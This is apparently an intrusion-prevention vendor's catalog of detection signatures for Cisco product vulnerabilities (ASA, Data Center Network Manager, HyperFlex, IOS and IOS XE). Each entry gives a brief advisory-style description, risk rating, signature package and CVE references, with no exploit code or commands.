https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-20359

Cisco-ASA-SSL-VPN-Code-Execution-CVE-2018-0101

About this vulnerability:

A vulnerability in Cisco ASA SSL VPN

Risk:

High

First detected in:

sgpkg-ips-1042-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Adaptive Security Appliance

Type:

Input Validation

Description:

There is a vulnerability in Cisco Adaptive Security Appliance (ASA) Software. A remote, unauthenticated attacker can use this to execute arbitrary code on the affected system.

Situation:

File-TextId_Cisco-ASA-SSL-VPN-Code-Execution-CVE-2018-0101

References:

CVE-2018-0101
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0101

Cisco-ASA-SSL-VPN-Privilege-Escalation

About this vulnerability:

A Cisco ASA SSL VPN Privilege Escalation vulnerability.

Risk:

High

First detected in:

sgpkg-ips-765-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Adaptive Security Appliance

Type:

Configuration Error

Description:

A vulnerability in Cisco Adaptive Security Appliance, versions 8.x before 8.2(5.48), which allows remote attackers to gain privileges by establishing a clientless SSL VPN session and entering crafted URLs.

Situation:

HTTP_CSU-Cisco-ASA-SSL-VPN-Privilege-Escalation

References:

CVE-2014-2127
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2127

Cisco-ASA-X-With-FirePOWER-Services-Authenticated-Command-Injection

About this vulnerability:

A vulnerability in Cisco ASA-X.

Risk:

High

First detected in:

sgpkg-ips-1507-5242

Last changed:

sgpkg-ips-1507-5242

Platform:

Unix; Linux

Software:

Cisco Adaptive Security Appliance

Type:

Input Validation

Description:

A vulnerability in Cisco ASA-X, versions 6.2.2 and earlier, 6.3.*, 6.5.*, and 6.7.*, which allows remote attackers to exexute arbitrary code through the ASA's ASDM web server.

Situation:

HTTP_CSU-Cisco-ASA-X-With-FirePOWER-Services-Authenticated-Command-Injection

References:

CVE-2022-20828
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-20828

Cisco-CNS-Network-Registrar-Denial-Of-Service

About this vulnerability:

A vulnerability in Cisco Systems CNS Network Registrar

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Cisco Network Registrar

Type:

Input Validation

Description:

There is a vulnerability in the way Cisco CNS Network Registrar handles network messages. The lock manager process, a component of the vulnerable product, will terminate upon receiving a specially crafted sequence of packets. This termination of this process will cause complete failure of the Central Configuration Management (CCM) server. An attacker can exploit this vulnerability to create a denial of service condition of the management services. CNS Network Registrar lock manager process (aiclockmgr.exe) will terminate upon receiving the specially crafted sequence of packets. This may also terminate the Central Configuration Management (CCM) server. The loss of the lock manager will prevent CCM from managing the various CNS components: DNS, DHCP , TFTP and configuration information such as address space, zones, user administration, and so on. An administrator must restart the server agent for normal operations to resume.

Situation:

Generic_CS-Cisco-CNS-Network-Registrar-Denial-Of-Service

References:

CVE-2004-1164
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1164

BID-11793
http://www.securityfocus.com/bid/11793

Cisco-Collaboration-Server-Upload-Vulnerability

About this vulnerability:	Cisco Collaboration Server Upload Vulnerability
Risk:	High
First detected in:	sgpkg-ips-631-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	Cisco Collaboration Server
Type:	Input Validation
Description:	There exists a vulnerability in Cisco Collaboration Server that allows an unauthorized user to upload files and gain administrative privileges.
Situation:	HTTP_CSU-Cisco-Collaboration-Server-Upload-Vulnerability

Cisco-Common-Services-Devices-Center-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Cisco Systems Common Services Devices Center

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Cisco Systems Unified Operations Manager

Type:

Input Validation

Description:

A cross-site scripting vulnerability exists within Cisco's Common Services Device Center, a component of Cisco's Unified Operations Manager. The vulnerability is due to insufficient input validation on input to a web application. A remote unauthenticated attacker can exploit this vulnerability by executing arbitrary HTML and script code in a user's browser session, in the context of the affected site. This could potentially allow confidential user information such as authentication cookies to be disclosed.

Situation:

HTTP_CSU-Cisco-Common-Services-Devices-Center-Cross-Site-Scripting

References:

CVE-2011-0962
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0962

OSVDB-72421
http://www.osvdb.org/72421

Cisco-Common-Services-Framework-Help-Servlet-Cross-Site-Scripting

About this vulnerability:

An attempt to exploit a vulnerability in CiscoWorks Common Services Framework Help Servlet

Risk:

Moderate

First detected in:

sgpkg-ips-394-4219

Last changed:

sgpkg-ips-1588-5242

Platform:

Generic

Software:

Cisco Systems CiscoWorks Common Services; Cisco Systems Unified Operations Manager

Type:

Cross-site Scripting

Description:

A cross-site scripting vulnerability exists within CiscoWorks Common Services Framework Help Servlet. The vulnerability is due to insufficient input validation while parsing input to a web application.

Situation:

HTTP_CSU-Cisco-Common-Services-Framework-Help-Servlet-Cross-Site-Scripting

References:

CVE-2011-0961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0961

BID-47902
http://www.securityfocus.com/bid/47902

OSVDB-72413
http://www.osvdb.org/72413

Cisco-Data-Center-Network-Manager-Createlanfabric-Command-Injection

About this vulnerability:

A vulnerability in Cisco Systems Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1233-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Data Center Network Manager

Type:

Malfunction

Description:

Improper validation of inputs sent by the client causes a command injection vulnerability in Cisco Data Center Network Manager. A successful exploit may allow an attacker to execute arbitrary code on the target system with administrator privileges.

Situation:

File-Text_Cisco-Data-Center-Network-Manager-Createlanfabric-Command-Injection

References:

CVE-2019-15978
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15978

Cisco-Data-Center-Network-Manager-Deletereporttemplate-Arbitrary-File-Deletion

About this vulnerability:

A vulnerability in Cisco Systems Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1228-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime Data Center Network Manager

Type:

Directory Traversal

Description:

There exists an arbitrary file deletion vulnerability in Cisco Data Center Network Manager. Successful exploitation could lead in arbitrary file deletion from the target system.

Situation:

HTTP_CRL-Cisco-Data-Center-Network-Manager-Deletereporttemplate-Arbitrary-File-Deletion

References:

CVE-2019-15981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15981

Cisco-Data-Center-Network-Manager-Getconfigtemplatefilename-SQL-Injection

About this vulnerability:

A vulnerability in Cisco Systems Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1260-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Data Center Network Manager

Type:

Input Validation

Description:

Insufficient validation of request data causes an SQL injection vulnerability in Cisco Data Center Network Manager. A successful exploit may allow an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CS-Cisco-Data-Center-Network-Manager-Getconfigtemplatefilename-SQL-Injection

References:

CVE-2019-15984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15984

Cisco-Data-Center-Network-Manager-Getlicenses-SQL-Injection

About this vulnerability:

A vulnerability in Cisco Systems Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1218-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime Data Center Network Manager

Type:

Input Validation

Description:

There has been reported a pre-auth SQL injection in Cisco Data Center Network Manager. Successful exploitation could result in arbitrary code execution.

Situation:

HTTP_CSU-Cisco-Data-Center-Network-Manager-Getlicenses-SQL-Injection

References:

CVE-2019-15984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15984

Cisco-Data-Center-Network-Manager-Getrestorelog-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1224-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Data Center Network Manager

Type:

Input Validation

Description:

There has been reported an information disclosure vulnerability in Cisco Data Center Network Manager. This vulnerablity could be exploited by an authenticated attacker. Successful exploitation could lead in disclosure of the target system files.

Situation:

HTTP_CRL-Cisco-Data-Center-Network-Manager-Getrestorelog-Directory-Traversal

References:

CVE-2019-15980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15980

Cisco-Data-Center-Network-Manager-Getswitchsdatalength-SQL-Injection

About this vulnerability:

A vulnerability in Cisco Systems Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1266-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Data Center Network Manager

Type:

Input Validation

Description:

Insufficient input validation causes an SQL injection vulnerability in Cisco Data Center Network Manager. A successful exploit allows an attacker to run arbitrarty SQL on the target database.

Situation:

HTTP_CRL-Cisco-Data-Center-Network-Manager-Getswitchsdatalength-SQL-Injection

References:

CVE-2019-15984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15984

Cisco-Data-Center-Network-Manager-Gettokeninfo-SQL-Injection

About this vulnerability:

A vulnerability in Cisco Systems Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1257-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Data Center Network Manager

Type:

Input Validation

Description:

Insufficient input validation causes an SQL injection vulnerability in Cisco Data Center Network Manager. A successful exploit allows an attacker to execute arbitrary code with the privileges of the database.

Situation:

HTTP_CRL-Cisco-Data-Center-Network-Manager-Gettokeninfo-SQL-Injection

References:

CVE-2019-15984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15984

Cisco-Data-Center-Network-Manager-Importts-Command-Injection

About this vulnerability:

A vulnerability in Cisco Systems Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1232-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Data Center Network Manager

Type:

Input Validation

Description:

Improper validation of the certFile parameter in requests to the importTS endpoint causes a command injection vulnerability in Cisco Data Center Network Manager. A successful exploit allows a remote attacker to execute arbitrary commands on the target system with administrative privileges.

Situation:

File-TextId_Cisco-Data-Center-Network-Manager-Importts-Command-Injection

References:

CVE-2019-15979
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15979

Cisco-Data-Center-Network-Manager-Installswitchlicense-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems Data Center Network Manager

Risk:

High

First detected in:

sgpkg-ips-1258-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Data Center Network Manager

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Cisco Data Center Network Manager. The vulnerability is due to insufficient validation of HTTP parameters by the Java class DbAdminRest A remote, authenticated attacker could exploit this vulnerability by sending crafted HTTP requests to the target server. Successful exploitation could result in arbitrary file write, which could be used to perform arbitrary code execution in the security context of SYSTEM.

Situation:

HTTP_CRL-Cisco-Data-Center-Network-Manager-Installswitchlicense-Directory-Traversal

References:

CVE-2019-15980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15980

Cisco-Data-Center-Network-Manager-Persistuserinfo-SQL-Injection

About this vulnerability:

A vulnerability in Cisco Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1244-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Data Center Network Manager

Type:

Input Validation

Description:

Insufficient validation of request data causes an SQL injection vulnerability in Cisco Data Center Network Manager. A successful attack may allow an attacker to execute arbitrary SQL on the target database.

Situation:

HTTP_CRL-Cisco-Data-Center-Network-Manager-Persistuserinfo-SQL-Injection

References:

CVE-2019-15984
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15984

Cisco-Data-Center-Network-Manager-RCE

About this vulnerability:

A vulnerability in Cisco Data Center Network Manager

Risk:

High

First detected in:

sgpkg-ips-1196-5242

Last changed:

sgpkg-ips-1645-5242

Platform:

Generic

Software:

Cisco Systems Prime Data Center Network Manager

Type:

Insecure Configuration

Description:

A vulnerability in Data Center Network Manager, versions 10.4, 11.0, and 11.1, which allows remote attackers to upload war files to the Apache Tomcat webapps directory and gain remote code execution through the /fm/fileUpload file upload servlet.

References:

CVE-2019-1620
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1620

Cisco-Data-Center-Network-Manager-Readconfigfileasxml-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1261-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Data Center Network Manager

Type:

Directory Traversal

Description:

Improper validation of user-sent XML data causes a directory traversal vulnerability in Cisco Data Center Network Manager. A successful exploit may allow an attacker to gain access to arbitrary files on the target system.

Situation:

File-TextId_Cisco-Data-Center-Network-Manager-Readconfigfileasxml-Directory-Traversal

References:

CVE-2019-15981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15981

Cisco-Data-Center-Network-Manager-Reporttemplateuploadpolicy-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1233-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Data Center Network Manager

Type:

Directory Traversal

Description:

Improper validation of the input data in the HTTP request by the Java class ReportWS causes a directory traversal vulnerability in Cisco Data Center Network Manager. A successful exploit may allow an attacker to write files which will be executed with system privileges.

Situation:

File-Text_Cisco-Data-Center-Network-Manager-Reporttemplateuploadpolicy-Directory-Traversal
File-TextId_Cisco-Data-Center-Network-Manager-Reporttemplateuploadpolicy-Directory-Traversal

References:

CVE-2019-15980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15980

Cisco-Data-Center-Network-Manager-Savelicensefiletoserver-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1226-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Data Center Network Manager

Type:

Directory Traversal

Description:

Insufficient validation of HTTP parameters by the Java class DbAdminRest causes a directory traversal vulnerability in Cisco Systems Data Center Network Manager. A successful exploit may allow an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Cisco-Data-Center-Network-Manager-Savelicensefiletoserver-Directory-Traversal

References:

CVE-2019-15980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15980

Cisco-Data-Center-Network-Manager-Savezoneinputfiletoserver-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems Data Center Network Manager

Risk:

High

First detected in:

sgpkg-ips-1260-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Data Center Network Manager

Type:

Directory Traversal

Description:

A directory traversal vulnerability has been reported in Cisco Data Center Network Manager. The vulnerability is due to insufficient validation of HTTP parameter filename in the method saveZoneInputFileToServer. A remote, authenticated attacker could exploit this vulnerability by sending crafted HTTP requests to the target server. Successful exploitation could result in arbitrary file write, which could be used to perform arbitrary code execution in the security context of SYSTEM.

Situation:

HTTP_CRL-Cisco-Data-Center-Network-Manager-Savezoneinputfiletoserver-Directory-Traversal

References:

CVE-2019-15980
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15980

Cisco-Data-Center-Network-Manager-Securitymanager-Authentication-Bypass

About this vulnerability:

A vulnerability in Cisco Systems Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1220-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Prime Data Center Network Manager

Type:

Malfunction

Description:

There has been reported an authentication bypass vulnerability in the SecurityManager component of Cisco Data Center Network Manager. Successful exploitation could lead in authentication bypass.

Situation:

HTTP_CRL-Cisco-Data-Center-Network-Manager-Securitymanager-Authentication-Bypass

References:

CVE-2019-15976
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15976

Cisco-Data-Center-Network-Manager-Storefilecontentinfs-Directory-Traversal

About this vulnerability:

A vulnerability in Cisco Systems Data Center Network Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1260-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Data Center Network Manager

Type:

Directory Traversal

Description:

Improper validation of requests to the storeFileContentInFS() method causes a directory traversal vulnerability in Cisco Data Center Network Manager. A successful exploit allows an attacker to overwrite any file on the target system, allowing arbitrary code execution.

Situation:

HTTP_CRL-Cisco-Data-Center-Network-Manager-Storefilecontentinfs-Directory-Traversal

References:

CVE-2019-15981
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15981

Cisco-Dcnm-TrustedClientTokenValidator-Authentication-Bypass

About this vulnerability:

A vulnerability in Cisco Data Center Network Manager

Risk:

High

First detected in:

sgpkg-ips-1219-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Data Center Network Manager

Type:

Insecure Configuration

Description:

There exists a vulnerability in Cisco Data Center Network Manager, versions prior to 11.3(1), which allows remote attackers to bypass authentication through the TrustedClientTokenValidator component by creating a valid session token from a hard coded cryptographic key which is shared across installations.

Situation:

HTTP_CS-Cisco-Dcnm-TrustedClientTokenValidator-Authentication-Bypass

References:

CVE-2019-15975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15975

Cisco-Dcnm-Unauthenticated-File-Download

About this vulnerability:

A vulnerability in Cisco Data Center Network Manager

Risk:

High

First detected in:

sgpkg-ips-1198-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Cisco Systems Prime Data Center Network Manager

Type:

Malfunction

Description:

A vulnerability in Cisco Data Center Network Manager, Linux virtual appliance 10.4(2), 11.0(1) and 11.1(1), which allows unathenticated remote attackers to download arbitrary files from the target filesystem.

Situation:

HTTP_CSU-Cisco-Dcnm-Unauthenticated-File-Download

References:

CVE-2019-1621
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1621

Cisco-Elastic-Services-Controller-Rest-API-Authentication-Bypass

About this vulnerability:

A vulnerability in Cisco Systems Elastic Services Controller

Risk:

Moderate

First detected in:

sgpkg-ips-1166-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Elastic Services Controller

Type:

Malfunction

Description:

There has been reported an authentication bypass vulnerability in Cisco Elastic Services Controller. This vulnerability could be exploited by sending a crafted HTTP request to the target server. Successful exploitation could lead in bypass of authentication.

Situation:

HTTP_CRH-Cisco-Elastic-Services-Controller-Rest-API-Authentication-Bypass

References:

CVE-2019-1867
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1867

Cisco-Hyperflex-Hx-Auth-Handling-Remote-Command-Execution

About this vulnerability:

A vulnerability in Cisco Systems HyperFlex Software

Risk:

Moderate

First detected in:

sgpkg-ips-1354-5242

Last changed:

sgpkg-ips-1354-5242

Platform:

Generic

Software:

Cisco HyperFlex

Type:

Input Validation

Description:

Improper sanitization of parameters sent by the user causes a remote command execution vulnerability in Cisco HyperFlex. A successful exploit allows an attacker to execute arbitrary code on the target system.

Situation:

HTTP_CRL-Cisco-Hyperflex-Hx-Auth-Handling-Remote-Command-Execution

References:

CVE-2021-1497
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1497

Cisco-Hyperflex-Hx-Data-Platform-File-Upload-To-RCE

About this vulnerability:

A vulnerability in Cisco HyperFlex HX Data Platform.

Risk:

High

First detected in:

sgpkg-ips-1365-5242

Last changed:

sgpkg-ips-1365-5242

Platform:

Linux; Unix

Software:

Cisco HyperFlex

Type:

Input Validation

Description:

A vulnerability in Cisco HyperFlex HX Data Platform which allows remote unauthenticated attackers to upload and execute arbitrary code do the insufficient validation of the /upload endpoint.

Situation:

HTTP_CS-Cisco-Hyperflex-Hx-Data-Platform-File-Upload-To-RCE

References:

CVE-2021-1499
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1499

Cisco-Hyperflex-Hx-Storfs-asup-Handling-Remote-Command-Execution

About this vulnerability:

A vulnerability in Cisco Systems HyperFlex Software

Risk:

High

First detected in:

sgpkg-ips-1352-5242

Last changed:

sgpkg-ips-1352-5242

Platform:

Generic

Software:

Cisco HyperFlex

Type:

Input Validation

Description:

A remote command execution vulnerability has been reported in Cisco Hyperflex. The vulnerability is due to improper input sanitization. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted request to the web-based management interface of the target server. Successful exploitation could lead to execution of arbitrary code in the context of the target process.

Situation:

HTTP_CRL-Cisco-Hyperflex-Hx-Storfs-asup-Handling-Remote-Command-Execution

References:

CVE-2021-1498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1498

Cisco-Identity-Services-Engine-Livelogsettingsservlet-Stored-XSS

About this vulnerability:

A vulnerability in Cisco Systems Identity Services Engine

Risk:

Moderate

First detected in:

sgpkg-ips-1138-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems ISE

Type:

Input Validation

Description:

There has been reported a stored cross site scripting vulnerability in Cisco Identity Services Engine. Successful exploitation can lead in execution of arbitrary script code in a web browser.

Situation:

HTTP_CSU-Cisco-Identity-Services-Engine-Livelogsettingsservlet-Stored-XSS

References:

CVE-2018-15440
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15440

Cisco-IKE-Information-Disclosure

About this vulnerability:

A vulnerability in Cisco Internet Key Exchange version 1.

Risk:

High

First detected in:

sgpkg-ips-1430-5242

Last changed:

sgpkg-ips-1430-5242

Platform:

Generic

Software:

Cisco IKE

Type:

Malfunction

Description:

A vulnerability in Cisco Internet Key Exchange version 1, which allows attackers to disclose information by sending a crafted IKEv1 packet to an affected device.

Situation:

Generic_UDP-Cisco-IKE-Information-Disclosure

References:

CVE-2016-6415
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6415

Cisco-IOS-And-IOS-XE-Buffer-Overflow-CVE-2017-6736

About this vulnerability:

A vulnerability in Cisco IOS

Risk:

High

First detected in:

sgpkg-ips-1822-5242

Last changed:

sgpkg-ips-1822-5242

Platform:

Cisco IOS

Software:

<os>

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in the SNMP subsystem of Cisco IOS 12.0 through 12.4, 15.0 through 15.6, and IOS XE 2.2 through 3.17. A remote attacker could use this vulnerability to execute code via a crafted SNMP packet.

Situation:

SNMP-UDP_Cisco-IOS-And-IOS-XE-Buffer-Overflow-CVE-2017-6736

References:

CVE-2017-6736
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6736

Cisco-IOS-And-IOS-XE-Buffer-Overflow-CVE-2017-6742

About this vulnerability:

A vulnerability in Cisco IOS

Risk:

High

First detected in:

sgpkg-ips-1801-5242

Last changed:

sgpkg-ips-1801-5242

Platform:

Cisco IOS

Software:

<os>

Type:

Buffer Overflow

Description:

Situation:

SNMP-UDP_Cisco-IOS-And-IOS-XE-Buffer-Overflow-CVE-2017-6742

References:

CVE-2017-6742
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6742

Cisco-IOS-And-IOS-XE-Software-Smart-Install-Remote-Code-Execution

About this vulnerability:

A vulnerability in Cisco Smart Install (SMI)

Risk:

High

First detected in:

sgpkg-ips-1088-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Cisco IOS

Software:

Cisco SMI

Type:

Buffer Overflow

Description:

A vulnerability in the Smart Install (SMI) feature of Cisco IOS Software and Cisco IOS XE Software could allow an unauthenticated, remote attacker to trigger a reload of an affected device, resulting in a denial of service (DoS) condition, or to execute arbitrary code on an affected device. The vulnerability is due to improper validation of packet data. An attacker could exploit this vulnerability by sending a crafted Smart Install message to an affected device on TCP port 4786. A successful exploit could allow the attacker to cause a buffer overflow on the affected device, which could have the following impacts: Triggering a reload of the device, Allowing the attacker to execute arbitrary code on the device, Causing an indefinite loop on the affected device that triggers a watchdog crash.

Situation:

Generic_TCP-SIET-Get_Config-Command
Generic_TCP-SIET-Change_Config-Command
Generic_TCP-SIET-Update_ios-And-Execute-Command
Generic_TCP-Cisco-SMI-Exploit-CVE-2018-0171
Generic_TCP-Cisco-IOS-And-IOS-XE-Software-Smart-Install-Buffer-Overflow

References:

CVE-2018-0171
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0171

Cisco-IOS-HTTP-Authentication-Bypass

About this vulnerability:

Cisco IOS HTTP authentication bypass vulnerability

Risk:

High

First detected in:

sgpkg-ips-154-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Cisco IOS

Software:

<os>

Type:

Input Validation

Description:

There is an authentication bypass vulnerability in Cisco IOS version 11.3. An unauthenticated remote user can use this vulnerability to execute any command with privilege level 15, allowing unrestriced access to the vulnerable device.

Situation:

HTTP_CSU-Cisco-IOS-HTTP-Authentication-Bypass

References:

CVE-2001-0537
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0537

BID-2936
http://www.securityfocus.com/bid/2936

OSVDB-578
http://www.osvdb.org/578

Cisco-IOS-Next-Hop-Resolution-Protocol-Vulnerability

About this vulnerability:

A vulnerability in Cisco IOS

Risk:

High

First detected in:

sgpkg-ips-1193-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Cisco IOS

Software:

<os>

Type:

Malfunction

Description:

There exists a buffer overflow vulnerability in the Next Hop Resolution Protocol (NHRP) functionality in Cisco IOS. This vulnerability allows remote attackers to cause a denial of service (restart) and execute arbitrary code via a crafted NHRP packet.

Situation:

IPv4_Cisco-IOS-Next-Hop-Resolution-Protocol-Vulnerability

References:

CVE-2007-4286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4286

Cisco-IOS-Server-HTTP-Interface-Cross-Site-Scripting

About this vulnerability:

Cross site scripting in the Cisco IOS HTTP Server detected

Risk:

Low

First detected in:

sgpkg-ips-787-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco IOS HTTP Server

Type:

Cross-site Scripting

Description:

A cross site scripting vulnerability exists in the IOS HTTP server versions 11.0 through 12.4.

Situation:

HTTP_CRL-Cisco-IOS-HTTP-Server-Cross-Site-Scripting

References:

CVE-2005-3921
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3921

BID-16291
http://www.securityfocus.com/bid/16291

BID-15602
http://www.securityfocus.com/bid/15602

Cisco-IOS-Telnet-Denial-of-Service

About this vulnerability:

A Cisco IOS Telnet Denial of Service vulnerability

Risk:

High

First detected in:

sgpkg-ips-952-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Cisco IOS

Software:

Cisco IOS Telnet

Type:

Insecure Configuration

Description:

A vulnerability in Cisco IOS telnet service, effecting multiple switches, which allows remote attackers to execute arbitrary code or cause a denial of service condition by sending malformed CMP specific telnet options.

Situation:

Telnet_CS-Cisco-IOS-Telnet-Denial-of-Service

References:

CVE-2017-3881
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3881

BID-96960
http://www.securityfocus.com/bid/96960

Cisco-IOS-XE-Command-Injection-CVE-2023-20273

About this vulnerability:

A vulnerability in Cisco IOS XE

Risk:

High

First detected in:

sgpkg-ips-1648-5242

Last changed:

sgpkg-ips-1648-5242

Platform:

Cisco

Software:

<os>

Type:

Input Validation

Description:

A command injection vulnerability has been reported in a web UI component of the Cisco IOS XE software. A remote, authenticated attacker can use this vulnerability to inject arbitrary commands as root. Chaining this vulnerability together with CVE-2023-20198 allows unauthenticated remote code execution on the target server.

Situation:

HTTP_CS-Cisco-IOS-XE-Command-Injection-CVE-2023-20273

References:

CVE-2023-20273
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20273

Cisco-IOS-XE-CVE-2023-20198-Implant-Detection

About this vulnerability:

An attempt to exploit a vulnerability in Cisco IOS detected

Risk:

High

First detected in:

sgpkg-ips-1642-5242

Last changed:

sgpkg-ips-1642-5242

Platform:

Cisco IOS

Software:

<os>

Type:

Input Validation

Description:

The web UI feature of Cisco IOS XE, when exposed to the Internet or to untrusted networks, could be exploited by a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access. The attacker can then use that account to gain control of the affected system. This fingerprint does not prevent the vulnerability from being exploited, but it detects the usage of the malicious implant which has been widely deployed to vulnerable systems in the wild.

Situation:

HTTP_CSU-Cisco-IOS-XE-CVE-2023-20198-Implant-Detection
File-Text_Cisco-IOS-XE-CVE-2023-20198-Implant-Detection

References:

CVE-2023-20198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20198

Cisco-IOS-XE-Privilege-Escalation-CVE-2023-20198

About this vulnerability:

A vulnerability in Cisco IOS XE

Risk:

High

First detected in:

sgpkg-ips-1646-5242

Last changed:

sgpkg-ips-1656-5242

Platform:

Cisco

Software:

<os>

Type:

Input Validation

Description:

A privilege escalation vulnerability has been reported in a web UI component of the Cisco IOS XE software. A remote, unauthenticated attacker can use this vulnerability to create an account with administrative access.

Situation:

HTTP_CSU-Cisco-IOS-XE-Privilege-Escalation-CVE-2023-20198
File-TextId_Cisco-IOS-XE-Privilege-Escalation-CVE-2023-20198

References:

CVE-2023-20198
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-20198

Cisco-IOS-XE-Rest-API-Authentication-Bypass

About this vulnerability:

A vulnerability in Cisco Systems REST API virtual service container

Risk:

Moderate

First detected in:

sgpkg-ips-1194-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Cisco IOS

Software:

<os>

Type:

Malfunction

Description:

